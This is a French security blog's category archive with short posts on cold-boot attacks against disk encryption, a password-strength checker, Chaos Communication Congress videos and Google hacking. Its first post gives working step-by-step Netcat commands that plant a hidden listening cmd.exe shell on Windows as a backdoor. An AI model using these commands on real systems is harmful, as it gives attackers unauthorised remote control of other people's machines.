Skip to content

Category archive for: Sécurité

Créer une backdoor sous windows ? Facile !!

Netcat, aussi surnommé le couteau suisse du TCP/IP, peut être utilisé aussi bien pour de bonnes choses que pour de mauvaises.

La preuve, Netcat peut servir à créer facilement des backdoors sous Windows.

  • Téléchargez la version Windows de Netcat.
  • Dézippez nc.exe dans le répertoire :

%SYSTEMROOT%\system32

  • Lancez la commande :

nc -d -L -e cmd.exe -p 10001
(Remplacez 10001 par le port qui vous intéresse)

  • Vous pouvez alors accéder à la machine à l’aide de la commande :

telnet X.X.X.X 10001

Et voilà, la démonstration est faite que même des outils très pratiques peuvent mal tourner dans de mauvaises mains !

[ HOW TO: Create a Back Door on Microsoft Windows ]
[ Netcat ]

Update:

[ Netcat ]

Tester la force de votre mot de passe

Le site Password Meter vérifie la force de vos mos de passe dynamiquement au fur et à mesure que vous les saisissez.

La force d’un mot de passe est évaluée à l’aide d’attributs positifs ou négatifs :

  • nombre de caractères
  • types de caractères utilisés
  • ordre des caractères (séquences de lettres ou de nombres)

Vérifiez vos mots de passe avec cet outil et vous serez peut être surpris.

[ Password Strength Checker ]

Utiliser un disque crypté ne vous protège pas pour autant …

C’est le résultat de recherches scientifiques basées sur le temps de persistance des données en mémoire après l’extinction de l’ordinateur.

En effet, la RAM n’est pas effacée instantanément : les données disparaissent progressivement après plusieurs secondes.

Pire : en refroidissant les barettes de RAM, les données restent utilisable pendant plus de 10 minutes.

La démonstration en images :

Toutes les plateformes sont touchées, notamment les programmes :

  • Microsoft Bitlocker
  • Apple Filevault
  • et Truecrypt

[ Disk encryption may not be secure enough, new research finds ]

Vidéos du 24ème congrès du Chaos Computer Club

Le 24ème congrès du Chaos Computer Club a eu lieu du 27 au 30 décembre à Berlin.

Et voici quelques vidéos de présentations qui y ont eu lieu.

1- Contourner les verrous de la XBox 360

(passionnant, mais attention, très technique !)

2- L’historique du hacking de la PSP3- Une annonce rapide pour la Wii :-)

Que du passionnant pour les fans de sécurité informatique !

[ Le 24ème congrès du CCC ]

[ CCC | Chaos Computer Club ]

Google vous aide à blinder vos sites

Google est votre ami, mais attention quand même à blinder vos sites contre les intrusions.

Sur cette vidéo, on peut voir qu’en utilisant quelques requêtes bien senties, on peut facilement accéder à des éléments de sites qui devraient être inaccessibles au public. (bon, je passe sur la requête qui remonte les mots de passe FrontPage, les webmasters tendent quand même le bâton pour se faire taper).


Google Hacks 2.0 – video powered by Metacafe

Instructif !